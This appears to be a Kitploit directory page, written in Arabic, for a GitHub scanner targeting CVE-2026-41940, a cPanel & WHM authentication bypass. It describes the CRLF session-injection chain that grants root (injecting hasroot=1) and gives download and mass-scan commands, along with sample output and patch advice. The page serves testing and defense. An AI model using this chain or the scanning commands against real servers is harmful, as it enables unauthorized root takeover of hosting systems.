Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
cPanel-WHM-CVE-2026-41940-AuthBypass — # ماسح لتجاوز مصادقة cPanel و WHM (CVE-2026-41940) ماسح يكتشف الإصدارات المعرضة للخطر عبر حقن CRLF والتلاعب بالجلسات، مع دعم تعدد الخيوط والبروكسي. | Kitploit
أدوات/GitHubGitHub/isee857/cpanel-whm-cve-2026-41940-authbypass
ماسحات الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويبأمن الويباختبار الاختراقالمصادقةالفريق الأحمر
GitHubisee857/cpanel-whm-cve-2026-41940-authbypass

cPanel-WHM-CVE-2026-41940-AuthBypass

# ماسح لتجاوز مصادقة cPanel و WHM (CVE-2026-41940) ماسح يكتشف الإصدارات المعرضة للخطر عبر حقن CRLF والتلاعب بالجلسات، مع دعم تعدد الخيوط والبروكسي.

عرض المستودع
منذ 3 أشهرلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2026-41940 أداة فحص تجاوز المصادقة في cPanel & WHM

⚠️ إخلاء المسؤولية القانوني

هذه الأداة مخصصة لاختبارات الأمان المصرح بها والأغراض التعليمية فقط. يجب على المستخدم الالتزام بالقوانين واللوائح المحلية، ويُحظر تمامًا فحص الأنظمة غير المصرح بها. المؤلف غير مسؤول عن أي إساءة استخدام.


🔥 نظرة عامة على الثغرة

العنصرالتفاصيل
معرف CVECVE-2026-41940
اسم الثغرةحقن CRLF في ملفات الجلسات في cPanel & WHM
مستوى الخطورة🔴 حرجة (CVSS 9.8)
الإصدارات المتأثرةcPanel & WHM < 11.110.0.97 / 11.118.0.63 / 11.126.0.54 / 11.132.0.29 / 11.134.0.20 / 11.136.0.5
نوع الثغرةتجاوز المصادقة ← الحصول على صلاحيات الجذر
صعوبة الاستغلالمنخفضة

مبدأ الثغرة

يوجد خلل منطقي في معالجة ملفات الجلسات في cPanel & WHM:

  1. دالة saveSession() تستدعي filter_sessiondata() بعد كتابة ملف الجلسة
  2. يمكن للمهاجم إنشاء ترويسة Authorization: Basic تحتوي على حقن CRLF
  3. يُكتب الحمولة الخبيثة مباشرة إلى ملف الجلسة على القرص، مما يحقن حقولًا مثل hasroot=1 و tfa_verified=1
  4. يؤدي ذلك في النهاية إلى تجاوز مصادقة WHM والحصول على وصول بصلاحيات الجذر

✨ الميزات

✅ كشف دقيق - إعادة إنتاج سلسلة الاستغلال الأصلية بدقة
✅ بدون تبعيات - يستخدم مكتبة Python القياسية فقط
✅ تعدد الخيوط - يدعم الفحص الجماعي
✅ دعم الوكيل - متوافق مع Burp Suite/Owasp ZAP
✅ تحليل ذكي - إكمال تلقائي للبروتوكول والمنفذ
✅ إخراج مميز - نتائج الثغرات بتمييز أحمر واضح

عملية الكشف (4 مراحل)

root@kitploit:~
[1] POST /login/?login_only=1          ← الحصول على جلسة ما قبل المصادقة
[2] GET / + حقن CRLF                   ← تلويث ملف الجلسة
[3] GET /scripts2/listaccts           ← تحفيز تحديث الذاكرة المؤقتة
[4] GET /cpsess/token/json-api/version ← التحقق من صلاحيات الجذر

🚀 البدء السريع

المتطلبات

  • Python 3.6+

تنزيل السكربت

root@kitploit:~
wget https://github.com/iSee857/cPanel-WHM-CVE-2026-41940-AuthBypass/blob/main/cPanel-WHM-CVE-2026-41940-AuthBypass.py
chmod +x cPanel-WHM-CVE-2026-41940-AuthBypass.py

📖 دليل الاستخدام

فحص هدف واحد

root@kitploit:~
# إكمال تلقائي لـ https://
python3 cPanel-WHM-CVE-2026-41940-AuthBypass.py -u 1.2.3.4:2087

# تحديد عنوان URL كامل
python3 cPanel-WHM-CVE-2026-41940-AuthBypass.py -u https://example.com:2087

فحص جماعي

root@kitploit:~
# قراءة الأهداف من ملف
python3 cPanel-WHM-CVE-2026-41940-AuthBypass.py -f targets.txt -t 20

# صيغة targets.txt:
# 1.2.3.4:2087
# example.com:2087
# https://test.com:2087

الفحص عبر وكيل (بالتعاون مع Burp Suite)

root@kitploit:~
# استخدام وكيل HTTP
python3 cPanel-WHM-CVE-2026-41940-AuthBypass.py -u 1.2.3.4:2087 --proxy http://127.0.0.1:8080

# فحص جماعي عبر وكيل
python3 cPanel-WHM-CVE-2026-41940-AuthBypass.py -f targets.txt --proxy http://127.0.0.1:8080 -t 5

المعاملات الشائعة

المعاملالوصفمثال
-u, --urlهدف واحد-u 1.2.3.4:2087
-f, --fileملف قائمة الأهداف-f targets.txt
-t, --threadsعدد الخيوط (الافتراضي 10)-t 20
--timeoutمهلة الانتظار (الافتراضي 10 ثوانٍ)--timeout 15
--proxyوكيل HTTP/HTTPS--proxy http://127.0.0.1:8080

📊 مثال على الإخراج

الثغرة موجودة (تمييز أحمر)

root@kitploit:~
13:45:01 [SCAN] Testing 1.2.3.4:2087
13:45:02 [INFO] Got session: 9f3a2c1b8d...
13:45:02 [INFO] Got token: /cpsess1234567890
13:45:03 [VULN] CVE-2026-41940 CONFIRMED! 1.2.3.4:2087
ScreenShot_2025-12-19_151413_652

الثغرة غير موجودة

root@kitploit:~
13:46:01 [SCAN] Testing 5.6.7.8:2087
13:46:02 [ERR ] Failed to get session 5.6.7.8:2087

🔍 شرح التحقق من الثغرة

يؤكد السكربت وجود الثغرة من خلال المنطق التالي:

  1. الحصول على الجلسة: نجاح الحصول على كوكي whostmgrsession
  2. استخراج الرمز: يحتوي الرد على مسار /cpsess{digit}
  3. التحقق من الصلاحيات: الوصول إلى /json-api/version يعيد 200 ويحتوي على حقل "version"

⚠️ ملاحظة: قد تعيد بعض الأهداف 500/503 وتعرض "License"، وهذا لا يزال يشير إلى نجاح تجاوز المصادقة، لكن فقط بسبب نقص الترخيص التجاري.


🛡️ توصيات الإصلاح

الترقية الفورية إلى الإصدارات الآمنة التالية:

  • 11.110.0.97+
  • 11.118.0.63+
  • 11.126.0.54+
  • 11.132.0.29+
  • 11.134.0.20+
  • 11.136.0.5+

إجراءات تخفيف مؤقتة:

  1. تقييد عناوين IP المسموح لها بالوصول إلى منفذ WHM (2087)
  2. تفعيل قواعد جدار الحماية
  3. مراقبة التغييرات غير الطبيعية في دليل /var/cpanel/sessions/

🙏 المراجع والشكر

https://labs.watchtowr.com/the-internet-is-falling-down-falling-down-falling-down-cpanel-whm-authentication-bypass-cve-2026-41940/


⚠️ تأكيد إضافي

هذه الأداة مخصصة فقط لاختبارات الأمان المصرح بها وأبحاث الدفاع. أي فحص غير مصرح به يُعد مخالفًا للقانون، وتتحمل العواقب بنفسك.


⭐ قم بتمييز هذا المشروع بنجمة للحصول على المزيد من تحديثات أدوات الأمان!

تنزيل الأداة